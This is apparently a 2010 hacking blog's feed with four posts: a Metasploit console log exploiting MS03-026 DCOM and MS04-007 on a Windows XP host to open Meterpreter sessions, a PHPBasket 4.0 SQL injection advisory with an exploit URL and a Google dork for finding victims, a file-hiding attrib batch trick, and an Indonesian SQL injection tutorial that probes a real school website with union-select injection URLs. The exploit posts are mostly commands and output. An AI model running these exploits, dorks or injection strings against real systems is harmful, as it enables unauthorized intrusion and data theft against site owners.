tag:blogger.com,1999:blog-6054496550226934772011-08-16T20:09:18.901-07:00["P-H-T"]["P-H-T"]http://www.blogger.com/profile/08176225590488967659noreply@blogger.comBlogger41100tag:blogger.com,1999:blog-605449655022693477.post-23889141589071603102010-06-06T17:29:00.000-07:002010-06-06T17:32:40.504-07:00Metasploit Proof of Concept [ Linux ]<pre><span style="font-family: monospace;">this is an old exploit but still works<br />i have test it on Local Area Network here<br />this exploit tested on </span><span style="font-family: monospace;">Windows XP Service Pack 1</span><br /><span style="font-family: monospace;"><br />[o] DCOM RPC Exploit (ms03_026_dcom)<br /><br /># Description<br />This module exploits a stack overflow in the RPCSS service, this<br />vulnerability was originally found by the Last Stage of Delirium<br />research group and has bee widely exploited ever since. This module<br />can exploit the English versions of Windows NT 4.0 SP3-6a, Windows<br />2000, Windows XP, and Windows 2003 all in one request :)<br /><br /><span class="fullpost"><br />root@ubuntu:~# ping 172.16.1.31<br />PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.<br />64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms<br />64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms<br />64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms<br />^C<br />--- 172.16.1.31 ping statistics ---<br />3 packets transmitted, 3 received, 0% packet loss, time 2005ms<br />rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms<br /><span class="fullpost"><br />root@ubuntu:~# nmap -O -PN 172.16.1.31<br /><br />Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT<br />Interesting ports on ******-******.kapukvalley.net (172.16.1.31):<br />Not shown: 1710 closed ports<br />PORT STATE SERVICE<br />135/tcp open msrpc<br />139/tcp open netbios-ssn<br />445/tcp open microsoft-ds<br />1025/tcp open NFS-or-IIS<br />5000/tcp open upnp<br />MAC Address: 00:1C:F0:5A:98:AF (D-Link)<br />Device type: general purpose<br />Running: Microsoft Windows 2000<br />OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1<br />Network Distance: 1 hop<br /><br />OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds<br /><br />root@ubuntu:~# cd /home/noge/pentest/metasploit/<br />root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole<br /><br /> | | _) |<br />__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|<br />| | | __/ | ( |\__ \ | | | ( | | |<br />_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|<br /> _| <br /><br /><br /> =[ msf v3.3-dev<br />+ -- --=[ 378 exploits - 234 payloads<br />+ -- --=[ 20 encoders - 7 nops<br /> =[ 154 aux<br /><br />msf > use windows/dcerpc/ms03_026_dcom<br />msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp<br />PAYLOAD => windows/meterpreter/bind_tcp<br />msf exploit(ms03_026_dcom) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />RHOST yes The target address<br />RPORT 135 yes The target port<br /><br /><br />Payload options (windows/meterpreter/bind_tcp):<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />EXITFUNC thread yes Exit technique: seh, thread, process<br />LPORT 4444 yes The local port <br />RHOST no The target address <br /><br /><br />Exploit target:<br /><br />Id Name <br />-- ---- <br />0 Windows NT SP3-6a/2000/XP/2003 Universal<br /><br /><br />msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31<br />RHOST => 172.16.1.31<br />msf exploit(ms03_026_dcom) > set TARGET 0<br />TARGET => 0<br />msf exploit(ms03_026_dcom) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />RHOST 172.16.1.31 yes The target address<br />RPORT 135 yes The target port<br /><br /><br />Payload options (windows/meterpreter/bind_tcp):<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />EXITFUNC thread yes Exit technique: seh, thread, process<br />LPORT 4444 yes The local port <br />RHOST 172.16.1.31 no The target address <br /><br /><br />Exploit target:<br /><br />Id Name <br />-- ---- <br />0 Windows NT SP3-6a/2000/XP/2003 Universal<br /><br /><br />msf exploit(ms03_026_dcom) > exploit<br /><br />[*] Started bind handler<br />[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...<br />[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...<br />[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...<br />[*] Sending exploit ...<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] The DCERPC service did not reply to our request<br />[*] Sending stage (2650 bytes)<br />[*] Sleeping before handling stage...<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)<br /><br />meterpreter > pwd<br />C:\WINDOWS\system32<br />meterpreter > sysinfo<br />Computer: ******-******<br />OS : Windows XP (Build 2600, Service Pack 1).<br />meterpreter ><br /><br /><br />=============================================================================================<br /></span><span style="font-family: monospace;">=============================================================================================</span><br /><br /><span style="font-family: monospace;"><br />[o] KILLBILL SMB Exploit (ms04_007_killbill)<br /><br /># Description<br />This is an exploit for a previously undisclosed vulnerability in the<br />bit string decoding code in the Microsoft ASN.1 library. This<br />vulnerability is not related to the bit string vulnerability<br />described in eEye advisory AD20040210-2. Both vulnerabilities were<br />fixed in the MS04-007 patch. You are only allowed one attempt with<br />this vulnerability. If the payload fails to execute, the LSASS<br />system service will crash and the target system will automatically<br />reboot itself in 60 seconds. If the payload succeeeds, the system<br />will no longer be able to process authentication requests, denying<br />all attempts to login through SMB or at the console. A reboot is<br />required to restore proper functioning of an exploited system. This<br />exploit has been successfully tested with the win32/*/reverse_tcp<br />payloads, however a few problems were encounted when using the<br />equivalent bind payloads. Your mileage may vary.<br /><br /><br />msf > use windows/smb/ms04_007_killbill<br />msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp<br />PAYLOAD => windows/meterpreter/bind_tcp<br />msf exploit(ms04_007_killbill) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />PROTO smb yes Which protocol to use: http or smb<br />RHOST yes The target address <br />RPORT 445 yes Set the SMB service port <br /><br /><br />Payload options (windows/meterpreter/bind_tcp):<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />EXITFUNC thread yes Exit technique: seh, thread, process<br />LPORT 4444 yes The local port <br />RHOST no The target address <br /><br /><br />Exploit target:<br /><br />Id Name <br />-- ---- <br />0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1<br /><br /><br />msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31<br />RHOST => 172.16.1.31<br />msf exploit(ms04_007_killbill) > show targets<br /><br />Exploit targets:<br /><br />Id Name <br />-- ---- <br />0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1<br /><br /><br />msf exploit(ms04_007_killbill) > set TARGET 0<br />TARGET => 0<br />msf exploit(ms04_007_killbill) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />PROTO smb yes Which protocol to use: http or smb<br />RHOST 172.16.1.31 yes The target address <br />RPORT 445 yes Set the SMB service port <br /><br /><br />Payload options (windows/meterpreter/bind_tcp):<br /><br />Name Current Setting Required Description <br />---- --------------- -------- ----------- <br />EXITFUNC thread yes Exit technique: seh, thread, process<br />LPORT 4444 yes The local port <br />RHOST 172.16.1.31 no The target address <br /><br /><br />Exploit target:<br /><br />Id Name <br />-- ---- <br />0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1<br /><br /><br />msf exploit(ms04_007_killbill) > exploit<br /><br />[*] Started bind handler<br />[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] Sending stage (2650 bytes)<br />[*] Sleeping before handling stage...<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)<br /><br />meterpreter > sysinfo<br />Computer: ******-******<br />OS : Windows XP (Build 2600, Service Pack 1).<br />meterpreter ></span></span></span></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-2388914158907160310?l=pantai11.blogspot.com' alt='' /></div>["P-H-T"]http://www.blogger.com/profile/08176225590488967659noreply@blogger.com0tag:blogger.com,1999:blog-605449655022693477.post-9208070441584855002010-06-04T15:04:00.000-07:002010-06-04T15:05:42.629-07:00PHPBasket 4.0 - SQL Injection Vulnerability[o] PHPBasket 4.0 SQL Injection Vulnerability<br />Software : PHPBasket version 4.0<br />Vendor : http://www.phpbasket.com/<br />Author : NoGe<br /><br /><br />[o] Vulnerable file<br />product.php<br /><br /><br />[o] Exploit<br />http://localhost/[path]/product.php?cat_id=[sql]<br /><br /><br />[o] Dork<br />"Powered by PHPBasket"<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-920807044158485500?l=pantai11.blogspot.com' alt='' /></div>["P-H-T"]http://www.blogger.com/profile/08176225590488967659noreply@blogger.com0tag:blogger.com,1999:blog-605449655022693477.post-35174043980294567602010-06-04T14:57:00.000-07:002010-06-04T14:59:44.882-07:00Hidden Files and Folders[x]<br /><br />how to hidden files or folders in windows without using any software?<br />maybe this is an old trick but still good and works :)<br />this trick will keep your files and folders hidden even you have choose option "show hidden files and folders" in "folder option" :p<br />tested on windows xp and windows vista home premium<br /><br />[x]<br /><br />first write this script and save as open.bat<br /><br />attrib -a -s -h [ folder or file to hidden ]<br />attrib -a -s -h open.bat<br />attrib -a -s -h close.bat<br /><br />second write this script and save as close.bat<br /><br />attrib +a +s +h [ folder or file to hidden ]<br />attrib +a +s +h open.bat<br />attrib +a +s +h close.bat<br /><br />[x]<br /><br />script explaination<br /><br />attrib : displays or changes file attributes<br /><br />a : archive file attribute<br />s : system file attribute<br />h : hidden file attribute<br />+ : sets an attribute<br />- : clears an attribute<br /><br />attrib +a +s +h [ folder or file to hidden ]<br /><br />you can put your files or folders name there<br />if you hidden a file dont forget to write down the file extention to<br /><br />example<br /><br />attrib +a +s +h pic.jpg <== hidden file name<br />attrib +a +s +h folderz <== hidden folder name<br /><br />what about this two files?<br /><br />attrib +a +s +h open.bat <== hidden open.bat<br />attrib +a +s +h close.bat <== hidden close.bat<br />attrib -a -s -h open.bat <== show open.bat<br />attrib -a -s -h close.bat <== show close.bat<br /><br />why we put this two files into the script to?<br />we must hidden this files to or anyone will open your hidden stuff<br /><br />if you have many folder to hide you can add into the script like this<br /><br />add this into close.bat<br /><br />attrib +a +s +h folder1<br />attrib +a +s +h folder2<br />attrib +a +s +h folder3<br /><br />dont forget to add into open.bat to<br /><br />attrib -a -s -h folder1<br />attrib -a -s -h folder2<br />attrib -a -s -h folder3<br /><br />[x]<br /><br />how to show it again?<br />you must have WINRAR to show your hidden stuff<br />open WINRAR and go to folder or drive where you hidden your stuff<br />WINRAR will show all hidden files or folders include open.bat and close.bat<br />click open.bat to show all your hidden stuff<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-3517404398029456760?l=pantai11.blogspot.com' alt='' /></div>["P-H-T"]http://www.blogger.com/profile/08176225590488967659noreply@blogger.com0tag:blogger.com,1999:blog-605449655022693477.post-55999209147298253272010-06-02T17:58:00.001-07:002010-06-02T18:08:10.046-07:00Simple SQL<p class="MsoNormal"><span style="" lang="EN-US">Wellcome friend…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Ini pertama kalinya saya mencoba untuk menulis dalam sebuah blog,jadi kalo masih banyak kekurangan jangan gebugin saya..tapi kalo ada kelebihan, silahkan donate ke rekening saya…:P<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Pertama saya akan mencoba menjelaskan tentang SQL injection,tapi cuma dikit aja maslahnya belum ada yg donate sich…</span><span lang="EN-US" style="font-family:Wingdings;"><span style="">J</span></span><span style="" lang="EN-US"><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Kalo master² mau nambahin silahkan….<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Kalo temen² mau kasih comment, boleh aja tapi donate dulu…xixixiixxi<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Ok,langsung aja degh…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"><!--[if !supportLists]--><b style="color: rgb(255, 0, 0);"><span lang="EN-US" style="font-size:16;">1.<span style=""> </span></span></b><!--[endif]--><b><span lang="EN-US" style="font-size:16;"><span style="color: rgb(255, 0, 0);">About Sql Injection</span><o:p></o:p></span></b></p> <p class="MsoNormal">Sql Injection merupakan trik untuk menyuntikan air uang(translated)..hihihi salah.maksudnya menyuntikan Permintaan SQL / perintah sebagai masukan yg<span style=""> </span>memungkin melalui halaman web ataupun melalui url.</p> <p class="MsoNormal">Singkat kan??makanya donate,biar saya punya cukup uang buat makan dan cukup tenaga buat ngetik…xixixixi. Ujung²nya suruh donate juga…<span style="font-family:Wingdings;"><span style="">J</span></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"><!--[if !supportLists]--><b style="color: rgb(255, 255, 51);"><span lang="EN-US" style="font-size:16;">2.<span style=""> </span></span></b><!--[endif]--><b><span lang="EN-US" style="font-size:16;"><span style="color: rgb(255, 255, 51);">Apa yg di butuhkan?</span><o:p></o:p></span></b></p> <p class="MsoNormal"><span style="" lang="EN-US">3 Kg<span style=""> </span>tepung imajinasi, 1,5 Kg kreatifitas, 800 gram logika, 400 gram kesabaran.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Dan yg paling penting harus ada koneksi internet dan web browser apapun. Dan jangan lupa juga 2 bungkus mallboro mix dan 1 botol bir.</span><span lang="EN-US" style="font-family:Wingdings;"><span style="">J</span></span><span style="" lang="EN-US"><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: -18pt;"><!--[if !supportLists]--><b style="color: rgb(0, 0, 153);"><span lang="EN-US" style="font-size:16;">3.<span style=""> </span></span></b><!--[endif]--><b><span lang="EN-US" style="font-size:16;"><span style="color: rgb(0, 0, 153);">Apa yg harus kita cari??</span><o:p></o:p></span></b></p> <p class="MsoNormal"><span style="" lang="EN-US">Pertama kita cari warnet yg murah dulu ( bagi yg blom punya laptop,like me ),,trus cari tempat yg nyaman,ga terlalu dingin dan ga terlalu panas,,trus bubu aja disitu..hehehe..bcandanya maksa,,ga lucu geto loch…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Harap maklum..lagi kelaperan nih…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Udah mulai serius nih,udah adzan subuh..xixixi ga ada hubungannya..<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Kita cari target di google dengan dork apa aja sesuka hati.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Missal: site:com cilacap<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Artinya kita mencari web .com dan yg mengandung kata cilacap.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Missal kita dapet<span style=""> </span><b><a href="http://sman1clp.com/">http://sman1clp.com</a><o:p></o:p></b></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Kita cari id nya <a href="http://sman1clp.com/index.php?cat=berita&idberita=50">http://sman1clp.com/index.php?cat=berita&idberita=50</a><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Selanjutnya kita cek web tersebut vulner atau gak..<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Caranya kita kasih tanda – di depan angka id nya. <o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Jadi <a href="http://sman1clp.com/index.php?cat=berita&idberita=-50">http://sman1clp.com/index.php?cat=berita&idberita=-50</a><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Apa yg terjadi??blank…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Yup, jika kita masukan – didepan angka id dan web menjadi blank atau keluar pesan eror,itu artinya web tersebut vulner.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><!--[if !supportEmptyParas]--> <!--[endif]--><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Selanjutnya kita cari binery nya. Caranya dengan perintah union select.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><a href="http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--">http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--</a><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">tanda + adalah string Sql yg berarti spasi.sama saja dengan %20. dan -– juga bisa diganti dengan /* untuk lebih jelasnya tentan g-string² SQL, Tanya mbah google.<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Ok,kembali ke tanktop..<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">Setelah kita masukin union select, apa yg terjadi??<o:p></o:p></span></p> <h1 style="font-weight: normal; font-style: italic;"><span style="font-size:100%;">The used SELECT statements have a different number of columns</span></h1> <p class="MsoNormal"><span style="" lang="EN-US">Kita tambahkan binerynya<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><a href="http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--">http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--</a><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US">ternyata masih </span><i>The used SELECT statements have a different number of columns<o:p></o:p></i></p> <p class="MsoNormal">tambahkan lagi sampe true dan ga kluar lagi pesan tsb.</p> <p class="MsoNormal">Ok, kita dapet<span style="" lang="EN-US"><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-US"><a href="http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--">http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--</a><o:p></o:p></span></p> <table style="width: 100%;" width="100%" border="0" cellpadding="0" cellspacing="3"> <tbody><tr> <td style="padding: 1.5pt;"> <p class="MsoNormal" style="text-align: center;" align="center"><span class="judulberitastyle3">3</span> </p> </td> </tr> <tr> <td style="padding: 1.5pt;"> <p class="MsoNormal" style="text-align: center;" align="center">Pengirim : 2, [ 6] </p> </td> </tr> <tr> <td style="padding: 1.5pt;"> <br /></td> </tr> <tr> <td style="padding: 1.5pt;"> <p class="MsoNormal">5</p> </td> </tr> </tbody> </table><br />ada apa dengan angka² tersebut????<br />Temukan jawabannya di <span style="font-style: italic; color: rgb(102, 51, 255);">Tutor SQL Part 2</span> hehehehehhehe..<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/605449655022693477-5599920914729825327?l=pantai11.blogspot.com' alt='' /></div>["P-H-T"]http://www.blogger.com/profile/08176225590488967659noreply@blogger.com0